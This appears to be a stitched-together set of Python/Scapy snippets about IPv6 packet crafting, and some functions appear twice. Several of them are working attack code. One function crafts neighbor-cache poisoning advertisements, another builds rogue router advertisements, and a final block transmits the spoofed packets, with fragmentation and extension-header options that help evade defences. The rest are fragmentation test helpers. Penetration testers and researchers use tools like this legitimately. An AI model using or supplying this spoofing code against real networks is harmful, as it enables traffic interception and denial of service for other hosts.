def ncp(args): """ Crafts a packet/packets that allow to poison NC """ if not args.srcmac: args.srcmac = ni.ifaddresses(args.output)[ni.AF_LINK][0]['addr'] if not args.srcip: for addr in ni.ifaddresses(args.output)[ni.AF_INET6]: if addr['addr'].lower().startswith('fe80'): args.srcip = addr['addr'][:-(len(args.output) + 1)] # Remove %interface from link-local address p = Ether(src=args.srcmac, dst=args.dstmac)/IPv6(src=args.srcip, dst=args.dstip, hlim=255) if args.frag: p /= IPv6ExtHdrFragment() if args.exthdrs: for i in range(args.exthdrs): p /= IPv6ExtHdrDestOpt() p /= ICMPv6ND_NA(tgt=args.na[0], R=int(args.na[1]), S=int(args.na[2]), O=int(args.na[3])) if args.lladdr: p /= ICMPv6NDOptDstLLAddr(lladdr=args.lladdr) if args.frag: return fragment6(p, args.frag) else: return [p]
def rra(args): """ Crafts (a) rogue router advertisment packet/packets """ if not args.srcmac: args.srcmac = ni.ifaddresses(args.output)[ni.AF_LINK][0]['addr'] if not args.srcip: for addr in ni.ifaddresses(args.output)[ni.AF_INET6]: if addr['addr'].lower().startswith('fe80'): args.srcip = addr['addr'][:-(len(args.output) + 1)] # Remove '%interface' from link-local address p = Ether(src=args.srcmac, dst=args.dstmac)/IPv6(src=args.srcip, dst=args.dstip, hlim=255) if args.frag: p /= IPv6ExtHdrFragment() if args.exthdrs: for i in range(args.exthdrs): p /= IPv6ExtHdrDestOpt() p /= ICMPv6ND_RA(chlim=args.curhop, prf=args.preference, routerlifetime=args.lifetime, reachabletime=args.reachtime, retranstimer=args.retrtime) if args.lladdr: p /= ICMPv6NDOptSrcLLAddr(lladdr=args.lladdr) if args.mtu: p /= ICMPv6NDOptMTU(mtu=args.mtu) if args.prefix: p /= ICMPv6NDOptPrefixInfo(prefix=args.prefix[0], prefixlen=int(args.prefix[1]), L=int(args.prefix[2]), A=int(args.prefix[3]), R=int(args.prefix[4]), validlifetime=int(args.prefix[5]), preferredlifetime=int(args.prefix[6])) if args.frag: return fragment6(p, args.frag) else: return [p]
def generate_ip6_frags(self, payload_length, fragment_size): p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length) p_ip6 = IPv6(src="1::1", dst=self.pg0.remote_ip6) outer_ip6 = (p_ether / IPv6(src=self.pg1.remote_ip6, dst=self.pg0.local_ip6) / IPv6ExtHdrFragment() / p_ip6 / p_payload) frags = fragment6(outer_ip6, fragment_size) p6_reply = (p_ip6 / p_payload) p6_reply.hlim -= 1 return frags, p6_reply
def generate_ip6_frags(self, payload_length, fragment_size): p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length) p_ip6 = IPv6(src="1::1", dst=self.pg0.remote_ip6) outer_ip6 = (p_ether / IPv6(src=self.pg1.remote_ip6, dst=self.pg0.local_ip6) / IPv6ExtHdrFragment() / p_ip6 / p_payload) frags = fragment6(outer_ip6, fragment_size) p6_reply = (p_ip6 / p_payload) p6_reply.hlim -= 1 return frags, p6_reply
def craft(hdr, fl): snd = [] rcv = {} for fl in range(fl, fl+nbrFlux): Utils.set_fl(hdr, fl) sip = 'fc00:2:0:1::1' # Adresses don't rlly matter dip = 'fc00:2:0:2::1' packets_snd = fragment6(IPv6(src=sip, dst=dip) / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data='A'*300), 100) packets_snd = [pkt.__class__(str(hdr/pkt)) for pkt in packets_snd[:-1]] # remove last frag snd.extend(packets_snd) rcv = {} return (snd, rcv)
def craft(hdr, fl): snd = [] rcv = {} for fl in range(fl, fl+nbrFlux): Utils.set_fl(hdr, fl) sip = 'fc00:2:0:1::1' # Adresses don't rlly matter dip = 'fc00:2:0:2::1' packets_snd = fragment6(IPv6(src=sip, dst=dip) / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data='A'*300), 100) packets_snd = [pkt.__class__(str(hdr/pkt)) for pkt in packets_snd] packet_excepted = pkt.__class__(str(hdr/IPv6(src=sip, dst=dip) / ICMPv6EchoRequest(data='A'*300))) snd.extend(packets_snd) random.shuffle(snd) # shuffle rcv[fl] = [packet_excepted] return (snd, rcv)
try: if not args.srcmac: args.srcmac = ni.ifaddresses(args.interface)[ni.AF_LINK][0]['addr'] if not args.srcip: for addr in ni.ifaddresses(args.interface)[ni.AF_INET6]: if addr['addr'].lower().startswith('fe80'): args.srcip = addr['addr'][:-(len(args.interface) + 1)] # Remove %interface from link-local address p = Ether(src=args.srcmac, dst=args.dstmac)/IPv6(src=args.srcip, dst=args.dstip, hlim=255) if args.frag: p /= IPv6ExtHdrFragment() if args.exthdrs: for i in range(args.exthdrs): p /= IPv6ExtHdrDestOpt() p /= ICMPv6ND_NA(tgt=args.na[0], R=int(args.na[1]), S=int(args.na[2]), O=int(args.na[3])) if args.lladdr: p /= ICMPv6NDOptDstLLAddr(lladdr=args.lladdr) if args.frag: sendp(fragment6(p, args.frag), iface=args.interface) else: sendp(p, iface=args.interface) except: sys.stderr.write('Unable to send a packet\n')